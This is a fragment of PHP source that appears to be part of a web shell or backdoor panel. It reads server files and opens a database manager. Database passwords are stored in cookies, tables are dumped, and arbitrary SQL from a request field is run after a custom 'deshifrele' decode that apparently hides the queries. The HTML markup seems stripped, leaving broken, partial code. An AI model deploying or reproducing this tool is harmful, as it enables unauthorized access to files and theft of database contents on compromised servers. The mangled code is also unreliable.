".highlight_string(file_get_contents($default_dir . $ayirici . $faylAdi), true)."
";
}
}
else if($ne == 'skl')
{
$host = isset($_COOKIE['host']) ? $_COOKIE['host'] : '';
$user = isset($_COOKIE['user']) ? $_COOKIE['user'] : '';
$parol = isset($_COOKIE['parol']) ? $_COOKIE['parol'] : '';
$baza = isset($_COOKIE['baza']) ? $_COOKIE['baza'] : '';
if( isset($_POST['host'] , $_POST['user'] , $_POST['parol'])
&& is_string($_POST['host']) && is_string($_POST['user']) && is_string($_POST['parol'])
)
{
$host = $_POST['host'];
$user = $_POST['user'];
$parol = $_POST['parol'];
$baza = '';
setcookie('host' , $host , time() + 360000);
setcookie('user' , $user , time() + 360000);
setcookie('parol' , $parol , time() + 360000);
setcookie('baza' , $baza , time() + 360000);
}
if( isset($_POST['baza']) && is_string($_POST['baza']) )
{
$baza = $_POST['baza'];
setcookie('baza' , $baza , time() + 360000);
}
$bazaStr = empty($baza) ? '' : 'dbname=' . $baza . ';';
?>
';
if( isset($_POST['t']) && is_string($_POST['t']) && !empty($_POST['t']) )
{
$tableName = deshifrele(urldecode($_POST['t']));
print '
Table: ' . htmlspecialchars($tableName) . ' (
Dump )
';
$getColumns = $pdo->prepare("SELECT column_name from information_schema.columns where table_schema=? and table_name=?");
$getColumns->execute(array($baza , $tableName));
$columns = $getColumns->fetchAll();
if( $columns )
{
$dataCount = $pdo->query('SELECT count(0) AS ss from `' . $tableName . '`');
$dataCount = (int)$dataCount->fetchColumn();
print '
Count: ' . $dataCount . '
';
$pages = ceil($dataCount / 100);
$currentPage = isset($_POST['sehife']) && is_numeric($_POST['sehife']) && $_POST['sehife'] >= 1 && $_POST['sehife'] <= $pages ? (int)$_POST['sehife'] : 1;
for ( $p = 1; $p <= $pages; $p++ )
{
print '
' . $p . ' ';
}
print '
';
$start = 100 * ($currentPage - 1);
$data = $pdo->query('SELECT * FROM `' . $tableName .'` LIMIT '.$start.' , 100');
$data = $data->fetchAll();
print '
';
foreach( $columns AS $columnInf )
{
print '' . htmlspecialchars($columnInf['column_name']) . ' | ';
}
print '';
foreach( $data AS $row )
{
print '';
foreach( $row AS $key=>$val )
{
print '' . $val . ' | ';
}
print '
';
}
print '
';
}
else
{
print 'Table not found!';
}
}
else if ( isset($_POST['emr']) && is_string($_POST['emr']) && !empty($_POST['emr']) )
{
$emr = deshifrele(urldecode($_POST['emr']));
print '
SQL emr: ' . htmlspecialchars($emr) . '
';
$data = $pdo->query( $emr );
$data = $data->fetchAll();
print '
';
if( count($data) > 0 )
{
print '';
foreach( $data[0] AS $key=>$val )
{
print '' . $key . ' | ';
}
print '
';
}
print '';
foreach( $data AS $row )
{
print '';
foreach( $row AS $key=>$val )
{
print '' . $val . ' | ';
}
print '
';
}
print '
';
}
print '
';
print '
';
print '